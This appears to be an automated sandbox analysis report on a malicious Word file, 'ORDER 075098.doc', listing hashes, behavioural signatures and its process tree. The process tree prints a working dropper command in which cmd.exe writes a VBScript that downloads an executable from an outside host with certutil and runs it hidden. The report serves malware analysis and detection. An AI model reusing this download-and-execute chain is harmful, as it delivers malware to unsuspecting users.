Analysis
-
max time kernel
158s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2022 07:54
Behavioral task
behavioral1
Sample
ORDER 075098.doc
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ORDER 075098.doc
Resource
win10v2004-20220812-en
General
-
Target
ORDER 075098.doc
-
Size
76KB
-
MD5
5b112030e331fc27826d844da94384c1
-
SHA1
345f750a8d23419c626363783a5c97642bbd61c1
-
SHA256
3b44d9aa4abd608f2dd1ec103d734c6402d3cb751dc2f38a46dc682aaa05a6bb
-
SHA512
44dd55eb3320996e144e57aa9c5a932b90cb6e05ab83e8a7cb46555cc2753a61352d4b9cddc3c3a3292c6d93d6975f7bccb50e35abde1bb0eef66ad5d4b59b9e
-
SSDEEP
768:IfCXf5zSe/q6s34bPX0sx8bP55lwNEF2KznO:IfCXf9SEqEXxOTdF9
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4880 4348 cmd.exe WINWORD.EXE -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 3548 timeout.exe 1252 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4348 WINWORD.EXE 4348 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4348 WINWORD.EXE 4348 WINWORD.EXE 4348 WINWORD.EXE 4348 WINWORD.EXE 4348 WINWORD.EXE 4348 WINWORD.EXE 4348 WINWORD.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WINWORD.EXEcmd.exeWScript.execmd.exedescription pid process target process PID 4348 wrote to memory of 4880 4348 WINWORD.EXE cmd.exe PID 4348 wrote to memory of 4880 4348 WINWORD.EXE cmd.exe PID 4880 wrote to memory of 3548 4880 cmd.exe timeout.exe PID 4880 wrote to memory of 3548 4880 cmd.exe timeout.exe PID 4880 wrote to memory of 8 4880 cmd.exe WScript.exe PID 4880 wrote to memory of 8 4880 cmd.exe WScript.exe PID 4880 wrote to memory of 1252 4880 cmd.exe timeout.exe PID 4880 wrote to memory of 1252 4880 cmd.exe timeout.exe PID 8 wrote to memory of 1768 8 WScript.exe cmd.exe PID 8 wrote to memory of 1768 8 WScript.exe cmd.exe PID 1768 wrote to memory of 2256 1768 cmd.exe certutil.exe PID 1768 wrote to memory of 2256 1768 cmd.exe certutil.exe PID 8 wrote to memory of 2232 8 WScript.exe cmd.exe PID 8 wrote to memory of 2232 8 WScript.exe cmd.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER 075098.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/dxll/ORDER%20075098.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe C:\Users\Admin\AppData\Local\Temp\bin.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe C:\Users\Admin\AppData\Local\Temp\bin.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bin.exe4⤵
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\script.vbsFilesize
301B
MD553fadd419d6720431005dc772d84aa40
SHA175e4387c8a99acb03a639a55f6b09e4244301953
SHA256a22ee63ce1b9b8692b52a9e6ddd4522447b90c15cab207576cffcf67833f42f1
SHA512a8095f4ebf9d7707844a4c28aa3d5e80eb4b2141adcb633be24b2a605ad663aba39888e5e878553d375826aadfa2381c9b2084dda534b708466409685f5aed7a
-
memory/8-141-0x0000000000000000-mapping.dmp
-
memory/1252-142-0x0000000000000000-mapping.dmp
-
memory/1768-144-0x0000000000000000-mapping.dmp
-
memory/2232-146-0x0000000000000000-mapping.dmp
-
memory/2256-145-0x0000000000000000-mapping.dmp
-
memory/3548-140-0x0000000000000000-mapping.dmp
-
memory/4348-132-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-138-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmpFilesize
64KB
-
memory/4348-137-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmpFilesize
64KB
-
memory/4348-136-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-135-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-134-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-133-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-148-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-149-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-151-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4348-150-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmpFilesize
64KB
-
memory/4880-139-0x0000000000000000-mapping.dmp